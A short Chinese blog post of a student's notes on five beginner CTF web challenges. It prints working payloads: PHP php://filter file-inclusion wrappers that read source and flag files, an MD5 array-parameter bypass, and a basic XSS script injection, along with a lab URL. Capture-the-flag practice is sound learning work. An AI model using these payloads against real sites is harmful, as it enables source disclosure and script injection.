CTF-1-5题笔记

CTF-1-5题笔记

POST

put me a message

ZmxhZ3twdXRfcmVxdWVzdHVoMjEyMzJ9 base64解码

F12

查看页面源代码和请求包头拼凑成flag

Code~md5

得到php代码 输入参数v1[]=1&&v2[]=2&&v3[]

得到flag

Include

重点难点对我而言

查看include1.php

构造伪协议

php://filter/read=convert.base64-encode/resource=include1(//注意不用加后缀.php)

解码知道include1过滤了flag,但有提示include2

再重新看include2解码发现没有过滤flag

构造伪协议 但要用rot13并且是include2下而非include1

php://filter/read=string.rot13/resource=flag

得到flag

http://192.144.182.32:8001/abf20c91a442da48/2/include2.php?file=php://filter/read=string.rot13/resource=flag

XSS

这个好像没有设置过滤,直接输入"><script>alert('XSS');</script>就绕过了

获得Key

Md5解码

"><script>alert('XSS');</script>

进行md5解密

心得:通过做题更加深刻理解这些方法。今天搞了好久第六题没搞懂啊,各种大小写,双写,畸形,.htaccess还是不行啊,提示没搞懂,靠。黑名单我特么都搞不来,菜!!!

【推广】 免费学中医,健康全家人
原文地址:https://www.cnblogs.com/cxl862002755/p/13190699.html